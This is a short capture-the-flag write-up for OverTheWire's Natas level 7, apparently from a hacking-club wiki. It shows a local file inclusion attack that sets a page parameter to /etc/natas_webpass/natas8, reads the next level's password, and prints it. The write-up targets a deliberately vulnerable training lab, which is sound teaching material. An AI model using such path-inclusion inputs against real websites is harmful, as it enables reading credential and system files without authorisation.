Natas7 - natas8

From JaxHax
Jump to navigation Jump to search

Level Goal

<Home> <About> 

Solution

This challenge just gives us two hyperlinks.

<Home> Points to http://natas7.natas.labs.overthewire.org/index.php?page=home

<About> Points to http://natas7.natas.labs.overthewire.org/index.php?page=about

This is probably going to be a LFI (Local File Inclusion) bug...

Clicking on <Home> gives us:

<Home> <About>
this is the front page 


Clicking on <Home> gives us:

<Home> <About>
this is the about page 


Decided to do a view source on this About page and saw a comment that says:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->


Decided to attempt the LFI route by going to http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

Got the following:

<Home> <About>
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe